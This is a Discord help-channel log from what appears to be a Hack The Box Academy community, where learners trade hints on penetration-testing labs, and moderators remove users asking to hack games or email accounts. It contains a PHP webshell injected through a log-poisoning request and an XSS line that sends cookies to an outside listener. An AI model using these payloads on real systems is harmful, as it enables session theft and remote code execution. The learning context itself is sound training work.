Password Attacks Lab - Medium: Have user ||jason|| and am able to ||dump keys and contents of one .tdb database||. Stuck past that, nudge would be appreciated 🙂

I think you have the wrong user.

i saw that

Could anyone help me out with the hard footprinting lab? ||I found creds to login to imaps but now im stuck||

Dm

guys can i hack games?

If u have skill

oh

Yes

roblox?

Nah, I think it's too safe

But u can create exploit

can u hack it for me?

idk how

can u teach me to hack?

Youtube

ur a pro hacker

k

@unkempt flame please read the rules before engaging in any conversation #rules

wha

oh

ok

anyone can hack roblox fr me?

++kick @unkempt flame

꧁乂|S̴̜͛ả̵̈́p̷͒͂n̵̎͊â̸̏p̶͛͝|乂꧂™ got the boot!

hi

no

dont

hello, please don't ask for anything illegal

if you try to ask again to hack anything you will be banned

what

this server should be illegal then

changing your username won't change your identity

u told to change ma name

i love everything about this

ok

Ayo why is asking for help illegal and Hacking is not in this group?

yea

i need justice

asking for help hacking a game company is illegal

then what are u doin?

And Hacking is not?

you need the #rules and discord tos, and to not forget the service that you are going to use TOS

not justice

if you want to make game cheats I suggest going to UC, otherwise we only entertain technical questions

whats UC?

or try out our gampwn challenges!

what

where?

here https://www.hackthebox.com/home/challenges/GamePwn

k

this is complicated

ima leave

yes hacking is complicated...

that's why we have this platform, to learn progressively

and get help and guidance when we're stuck

DNS fail in HTB Academy Boxes ?

When trying to enumerate a domain behind a specific DNS/Name-Server , then this DNS-Server should have open port 53, right ??

For zone transfers yes

Need a Nudge for Attacking Common Services SQL. Got mssqlsrv creds but looking for a nudge. Dug into the flagDB but not getting any content from it.

that's weird did you saw the ||tb_flag|| table in flagDB ?

yeah

Yep.

did you try this command ||SELECT * FROM tb_flag|| ?

while I have you here let me spin it up and DM u, but I’m almost certain I did

sure

Hi. Having problem on STACK-BASED BUFFER OVERFLOWS ON WINDOWS X86 Final Assestment. Someone finished it? DM please

Hello, I can't get past the privileged groups section, I grep the /var/log directories and I get a flag but it doesn't

Anybody know if there also is a modul for malware analysis?

I am stuck on file upload attacks modules skills assessment, got to point where I can upload file to server (and find it after the name modification) but I cannot give it any commands as it is .jpeg. how should I continue from here?

Hey, I am stucked on medium assessment. Did you successed with this? Or could u give any hint?

DM me

Hi, I'm stuck at the module "Attack Common Services - Skill Assessment Medium". Did a scan with nmap first on the top and then on all ports and I'm getting 4 services. However the enumeration did on them didn't get me anywhere. Any tip? Thanks

feel free to DM me

looking for a nudge on how to find valid ad users in the ad skills assessment I

done

yes sorry for replying late

hi everyone im stuck at Firewall and IDS/IPS Evasion - Medium Lab in the nmap academy module. The question requires the DNS version number. I found port 53 to be running the DNS service but the nmap script isn't returning output for some reason. What am I doing wrong? any help is super appreciated

anyone available for a nudge on the first skills assessment of the ad enumeration module?

qubit...it's a while since i have done this... try with source port 53

Dm me

I set the source port to 53 actually here is what my command looks like: nmap 10.129.210.26 -p 53 -sU -sV --script dns-nsid --source-port 53 and I'm getting port 53 in open state with service as domain and version as NLnet Labs NSD

Dm if you want

mh... i think this command will work: sudo nmap -sV -sC -Pn -p- 10.129.63.243

it won't work since

really? Stupid question you replaced the ip with yours? Than there should be a Flag at p53 as version number...starts with HTB{Go

hi there

i would like to ask something about search engine tracker

can anyone discuss it with me?

for some case, discord being a platform which search engine do their tracker abnormally. does anyone also face it?

thx in advance

Hey, can anyone help with Password Attacks Medium Lab?

@brave prawn i might be able to help 🙂

Hi everyone 😀 question saying ... Try running 'auxiliary/scanner/http/http_put' in Metasploit on any website, while routing the traffic through Burp. Once you view the requests sent, what is the last line in the request

Last request line connection closed

@lapis pivot if you can't get it to route through burp... you can actually find the solution ||in the exploit options in metasploit||

Can someone point me to correct direction with: Getting started - Knowledge check? I got reverse shell, but have hard time doing privilege escalation. I know with Sudo -l that /usr/bin/php can be run without password, but how can I get it to work? Edit: I get "Tee /usr/bin/php: permission denied"

Dm i think I can help

hi i need help i can't login in

is there someone who lives in Morocco

anyone for a nudge on the last question of the ad enumeration skills assessment 1?

@copper creek DM me 🙂

@west canopy .. I have checked the options I changed proxi option to 'yes' but still not working

Look at the options... what three words do you see|| next to FILEDATA?||

Am seeing many options like proxi, rhost ,vhost ,SSL ,path

hello i am new here is this channel chat channel?

@west canopy I have set everything ..

I tired of this lap 🥺.. please give me the big hint@west canopy

one sec

hi, in module Linux privilege escalation , section special permissions, i find the file with SUID that is different from their output, but it won't count as correct (in the answer)

edit: found, there's one more in the output

Hi Looking for some guidance on question "Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer" hope someone can help

on section "https://academy.hackthebox.com/module/112/section/1067"

Hi, I'm looking for some guidance on the Intro to Network Traffic Analysis module. Would anyone be able to assist?

Ah there we go nevermind :/

Hello humans
can somebody help me with the "Skills Assessment - File Inclusion"
https://academy.hackthebox.com/module/23/section/513
i have:

||i have the admin panel and know the /ilf_admin/index.php?log=../../../../../../../var/log/nginx/access.log path but ether it is buggy or i do something wrong..||

||GET /ilf_admin/index.php?log=../../../../../../../var/log/nginx/access.log&cmd=ls HTTP/1.1 Host: 206.189.113.19:31855 Upgrade-Insecure-Requests: 1 User-Agent: <?php system($_GET["cmd"]); ?> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close||

your overcomplicating it.

god damn wdym 😄

since I had changed the user-agent header, the log does not spit out anything new

no matter what i type in
the header log doesnt change anymore

you may have to respawn and do it again

yeah that is the funny thing..
it doesnt work

again .. xD

one sec

i had this bug a few times already..

i click on reset and it resets but the same IP:Port appears

is there a bug on this module ?
i mean if you want you can try it too ..
then you will knwo what i mean
IP:
http://206.189.113.19:31855/ilf_admin/index.php

can anyone give me a nudge on the assement for file upload attacks? I think im close, just cant seem to get anything thats "executable", i just get "images with errors" - not sure I understand what adding null will do to the filename

Keep trying different filenames, and dont worry so much about null bytes

Yeah, what I ended up doing was connecting to OpenVPN in the Virtual Machine

hey guys can we connect academy lab to my kali attackbox ?

I tried to connect to my kali using vpn config but it gives this error

you could try a different vpn
https://academy.hackthebox.com/vpn

Hello. I am on the module "Using Web Proxies". I am on the Zap Scanner page. After running an active scan with Zap, I should get a hit on a high vulnerability alert. But all I get are medium and low alerts. (And one informational.) I have followed the instructions on the page. (Although I did not update the security certificate as explained earlier in the module, because I am using a Pwnbox and I thought it was pre-configured.)

Does anyone have any advice?

hello, my terminal in kali linux on VirtualBox respond by errors even i type the correct commands . hat should i do?

hi

where can i purchase voucher for academy hack the box

Hey! Visit https://academy.hackthebox.com/ sign up and then you will be able to purchase a plan. If you have a registered student email you are eligible for a student discount.

What kind of errors? Have a screenshot or copy paste example?

what commands are you typing and what errors are you getting

i don't want to start now

like is there sth like voucher

like thm does

THM is a subscription based service. HTB Academy is similar but does an honestly overly confusing "cube" system. You'll need to look at that on your own to get an idea of how it works and what would be best for you

Need help with the metasploit framework meterpreter skill

Anyone willing to dm so I can discuss my thoughts?

shoot

4 ex : when i clone into github he keep asking me for username and passwd

i wanna be pentester would u help me!?

when I went for a job interview, the technical test they had was simpler than the cbbh path
I'd give that a crack, make sure you understand whats going on, and then you can probably try to sign on with a company

Can I possibly get a hint or two on Attacking Common Services: DNS? I've tried everything. Fierce, subbrute, subfinder, dig, gobuster. If I get subdomains, I get a whole lot of them, or I get none at all and I'm trying not to chuck my laptop out the window.

if you're doing attacking DNS section on Attacking common services, and subbrute or gobuster is taking too long,
there's a shortcut on how to find all available DNS records. ||if you did an nmap scan you'll find there's port 22 open
turns out to be the same box as attacking ftp service. ssh to the box using the same credential you found
for the user robin. ||On footprinting module there's a DNS section and it explains how to access local DNS configuration
||by doing > cat /etc/bind/named.conf.local ||| you'll find all available DNS zones and one of them has the flag.

Yeah, I did the DNS footprinting module. I didn't even think to use ||ftp||

Hello new here if I have lab questions can I post a snippet

Thank you for sharing! This is the answer. Bloody typo...

Please who can help email me please. I need to get remote connect on PWN-Box to windows to resolve quetion in windows fundamental.

Hi, can someone help me, I can't solve this question What is the FQDN of the host where the last octet ends in "x.x.x.x.203"?

please don't leak your email

Please someone help me, I have spent many hours on this.

Which module?

Footprinting , DNS

Just dm u

hey guys can anyone help me with the initial access to the AD Enumeration & Attacks - Skills Assessment Part 2

guys who can hack an email

++kick 969465931791233064 read the #rules next time, don't ask for anything illegal

hey

Good Morning! Can I get some help with Footprinting SMB. I'm on the last question which is "What is the full path to the SMB share". The hint says C:\ is for only Windows machines.

I've tried variations of:

/Devops/home/sambauser
/home/nobody/sambashare

I've scoured the internet for help, and my last hope is one of you good people.

Dm me 😊

In the setting up module, I can't exactly follow up all the instructions that are given in it.

Because, most of the things that are present in the module and the screenshots with the commands don't work in my VM like it's in the module.

there's tool.list file and other files which are shown in the modules but they aren't present in the VM, so like we have to make the files then download the tools or am I missing something?

Also, in the Operating Systems category, in Windows, is it recommended to configure the bare metal host or make a VM for it?

look at ||responder/inveigh || 🙂

has anyone completed the LDAP module? i need help on the final question 😛

what is fingerprinting in terms of browsing and surfing ?

@everyone

no one ? 😶

Hi; I have problem with Attacking Common Services - Medium. I can not find a username. I tried with smtp-user-enum and DNS lookup, but no results.

Fingerprinting in terms of browsing are the techniques used to gather information about a person or an organization (cookies, canvas fingerprint, WebRTC)

In cybersecurity fingerprinting are the techniques used to gather information about the configuration of a system/network or other infrastructure

Enumeration is listing connected device while fingerprinting deep dives further into ports, installed software and service /OS settings

could someone help with Password Attacks Hard Lab? I tried to crack masterkey of keepass file, but no success. Also tried crack the password of user D on winrm and smb services, but also no success. Mounting nfs is also unuseful. I am stucked and don't know what to do

Hi Could anyone help me about academy.ovpn?

where is your academy.ovpn file? in Desktop folder?

@brave prawn Both desktop and Download folder

try sudo openvpn ~/Desktop/academy.ovpn

@brave prawn

the same error

try reinstall openvpn

Or try downloading the file again plus check the vpn section on the getting started module

use the mutated wordlist

do a full port scan and enum the highest port

you mean port 995?

nope higher

I reinstall openvpn and download ovpn file again.

but got the same error

@vast geyser try this #modules message

Hi ,https://kali.download/kali/pool/main/o/openvpn/ this web remove the 2.5.6 version openvpn

so you are using openvpn 2.5.6?

oh you are using openvpn 2.5.7

I use 2.5.7

i don't think that is an issue

i m using it, but nothing(

the password for that should be a bit over 73000 word in the mutated wordlist

Hi , i solved change download web to http://ftp.debian.org/debian/pool/main/o/openvpn/openvpn_2.5.1-3_amd64.deb

Thanks

Happy Wednesday! Would appreciate a little help troubleshooting problems with guestfish - libguestfs

.

Hi i need help with File Inclusion module - PHP Wrappers. Im able to get the flag executing comands with data and input wrappers but i cant get it with expect. The extension is enabled (i search it in apaches php.ini). This is what i tried: curl -s "<IP>:<PORT>/index.php?language=expect://comand". What im doing wrong?

Hi, I have problem with Attacking Common Services - Hard. I can do RDP login with F* ** * user, but I can not login to MSSQL

@shadow orbit we should be able to connect with ||windows command line sqlcmd :)||

Hi I got a problem with one of skill assessment every single deployed target was accessible through vpn and now when I'm on the assessment it's just "hanging" in the browser. When I tried curl it it shows me a redirection, when I follow redirection it "hanging" on the terminal. I've checked on two different browsers. When I've checked on pwnbox it works fine. Never had that issue before, is it possible that the problem is not on my side?

@surreal marsh this might sound silly but i would restart your router and download a new vpn.

Reason i say this --- when I was going thru Windows Priv Esc, i simply could not move files over to the windows targets. Could not figure out if it was intended or not and it definitely wasn't , but restarting my router fixed it.

I've replaced the vpn file with new one and restarted the environment few times

ah shoot 😦

i didn't restarted the router though...

I'll try

CU in few minutes 🙂

yes its worth a shot!

goood luck!

thx

well that didnt help

weird

what module r u on

if its a docker target we shouldn't need vpn connection i dont think

For the broken Auth skills assessment none of the passwords I use for login for (s.u) are not working my list was narrowed down to 96 lines. I don’t know if it’s my modified script or I don’t have the right password

Can someone give me some help if they’re free?

XSS

I guess I have to use pwnbox for this one

can someone please help me with the "Session Security - Skills Assessment"?
https://academy.hackthebox.com/module/153/section/1458

||I have already found a XSS Vector but i cant get it||

||and i found a way to get a cookie with a XSS but how should i get the cookie from the admin ?|| 😄

||<script> document.write('<img src="http://10.10.14.111:1337/?c='+document.cookie+'" />'); </script>||

@shadow willow have you played around with ||the api endpoint? If you make a successful api call, which user is revealed? Maybe we can use the api to make that user visit our XSS page....||

damn you are a GOD

i have my moments 🙂

does anyone know the correct formatting for reporting module on the first tmux question?

[Key] + [Key] + [Key] -- (etc) -- if you look at the part in the sentence that begins "Once in the session, type" you'll have a better understanding of what I'm saying -- @copper creek

i need a tmux guru to teach me how to scroll while in copy mode

ctrl+d: half-screen forward
ctrl+u: half-screen backward
ctrl+b: full-screen backward
ctrl+f: full-screen forward
ctrl+e: one line scroll forward
ctrl+y: one line scroll backward
/: search forward
?: search backward

let me try this , thank you!

Edit: no dice 😦 thanks tho

Do someone has pass the HTB Certified Bug Bounty Hunter?

that didn't work for you?
hold on let me check

for example , i just used python to print numbers 1-100. I am in tmux copy mode... how do i scroll UP while copying?

Like if i wanted to copy everything , 1 through 100? I don't get why i can't figure this out. Also i dont know if it matters but i cant use my page up or page down keys on my laptop

hmm ctrl+u while having something selected works for me

or if i enable mouse scrolling in the conf file, then the copy/paste doesnt work haha

maybe you need a specific config option

setw -g mode-keys vi in your tmux.conf

EDIT: i think we might be gucci!

nice

so to copy i just press enter right?

is it normal for my ctrl-shift-v to not work when pasting?

yes

i think

i don't know the default shortcut but i added this to my tmux.conf

bind -T copy-mode-vi v send -X begin-selection                                  
bind -T copy-mode-vi y send -X copy-selection-and-cancel

to copy with y

only works if vi mode is enabled

gotcha

thanks for your help 🙂

np, hope you can copy as much as you want now

hehe

hello guys can someone help in this questions i am stuck on it in footprinting-SMB

What is the full system path of that specific share?

Hello everyone. As much as I hate to admit this, I am completely new at everything within HTB. I'm currently working in Linux Fundamentals and I am completely lost with the questions in section, "System Information". The first 2 questions I was able to solve. The rest, well for whatever reason I am completely stumped in how to figure out the answers. I have looked and looked and looked and I'm just lost at this point. Anyone with a little advice or suggestions would greatly be appreciated.

@rustic sage i might be able to help, feel free to DM 🙂

I'm having a problem with http request module...

it says to look for a Flag request in devtools, but none come up, a 404 comes up as the last request

along with a bunch of pngs

404 get FaviconLoader.jsm is the last thing loaded, no file called flag

@west canopy Watch the ippsecc tmux video I sent you a while ago 🤣

it did not work yaoi

it just was not meant to be , and thats ok

i will slowly make new tabs in QTerminal , and somehow find a way to survive without nested SSH sessions

and i can scroll with my mouse while copy and pasting. I mean i get tmux is great, but this is basically a super power

imagine using a mouse in 2022

based

its true bro they r trying 2 censor me

hello

i need help

LInux fundamentals

what is the path of the email ???

plss

@long plover try running the|| env|| command and read the output carefully... it looks like|| there is a variable called MAIL...?||

tanks

thanks*

np !

i will try it

work it

thanks a lot!!

hey

Could someone DM me about Attacking Common Services: DNS? I'm still having issues and I don't still have credentials from previous sections, so I can't shortcut it. Nvm. I /finally/ found it

Okay so with Attacking Common Services: Email, I have the credentials, but how do I go about accessing the account?

use telnet to connect to one of the email service running on ||port 143||

Hey, would you like to help me getting this to work? I just can't get it right

Hi I'm struggling with the Skills Assessment - File Inclusion. I already read here that there is an admin panel at|| /ilf_admin/ ||How did you find it though? I tried multiple wordlists. Thanks for your help!

try to read the ||index|| file

You mean the HTML-code? Nothing obvious as far as I can see

nope use the lfi vuln to read the ||index|| file you can't just read the web source code

Ok, thx then I think I have not found the first LFI yet.

save

Just to double check my approach - 1. I searched for additional php files 2. I search for existing parameters of the found php files like fuf -w ~/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://167.71.140.137:30050/contact.php?FUZZ=value' -fs 2714 3. I search for valid values of the identified paremeters - correct?

no the vulnerable parameter isn't contact.php and also i didn't fuzz anything i just found the vuln and read the file hint with ||base64||

Hi everyone. I'm stuck with SQLMAP ESSENTIALS - Skills Assessment. I've gone through a lot of hints and I'm pretty sure it is not much I'm missing, but I can't figure out the right sqlmap options to find a working sqli. I'm attacking action.php with an json payload and I am using the tamper script mentioned in this chatroom. DM appreciated

did you use the ||TESTPARAMETER (-p)|| tag in sqlmap?

I appreciate your help, Ok then I will go over the content from the module again and try to double check what I missed. Thx!

yes. I point it to ' ||id||'

may I send you my sqlmap command via DM, so you can check, what I might miss?

sure

How to solve the EXE program by angr

Hi guys. Anyone who finished Documentation & Reporting Practice Lab Section from Documentation & Reporting module? Cant solve second question on "After achieving Domain Admin, submit the NTLM hash of the KRBTGT account"

Good Morning! Will someone be as so kind to help me with the DNS module under FOOTPRINTING? Trying to find the FQDN name for the host ending in .203.

I have tried to run the discovery script with the firerce word list and it still doesn't give me the required IP.

Means it's probably in a very short and well known password list

That might be available in seclist

@balmy moon try zone transfer

@languid dawn try welcome2

Thanks! @placid quest and a huge lift from @feral stump!

Okay here is a solid for someone in /Footprinting/SMTP section.

Start from the bottom of the list!!

so painful, lol, I can type VRFY pretty competently now.

Hello, I wanted to ask that in the "Setting Up" module, the instructions are given to download windows 10 devVM but I have downloaded the windows 11 devVM which was available on the microsoft website. Will the instructions be followed up to windows 11 too or just windows 10?

Anyone?

Thank you for this. Keep in mind that ZAP seems NOT to add Content-Type when switching methods via DROPDOWN. I opened a feature request for this and I may even fix it myself, I consider this to be a huge bug https://github.com/zaproxy/zaproxy/issues/7440

Find all TCP ports on your target. Submit the total number of found TCP ports as the answer. ___

nmap -Pn -p- 10.129.245.214

All 65535 scanned ports on 10.129.245.214 are in ignored states.
Not shown: 63725 filtered tcp ports (no-response), 1810 filtered tcp ports (host-unreach).

Put 65535. WRONG!
Put 1810. WRONG!
Put 63725. WRONG!

Help me...

Hello. Stuck on one question in "Using Web Proxies". The question is:
Run ZAP Scanner on the target above to identify directories and potential vulnerabilities. Once you find the high-level vulnerability, try to use it to read the flag at '/flag.txt'

I ran the ZAP Scanner, a spider, and an AJAX spider. Nothing is giving me a high level alert. Also, my ZAP HUD is viewable, but unresponsive. I'm using a Pwnbox. Does anyone have any suggestions on how to scan for the high level alert?

Is that from one of the Academy questions?

Yes indeed.

Using Web Proxies, Zap Scanner.

what is the output of your command?

I ran it from a kali vm and used HUD. Had no issues finding the vuln.

Okay. This is probably related to a configuration issue within the pwnbox. I have a Kali VM. I'll try that. Thank you.

Hi

Having trouble with the windows module section: NTFS vs. Share Permissions. Cannot connect to the smbclient I keep getting the same error. Is the SMBclient hackthebox uses outdated? if so that would explain why the syntax may not be working. If anyone knows what Im doing wrong please let me know

I cant post the screenshot here for some reason. :v

Im doing this : smbclient -L 10.129.148.11 -U htb-student
do_connect: Connection to 10.129.148.11 failed (Error NT_STATUS_IO_TIMEOUT)

what happens if you try it without specifying a user?

same error code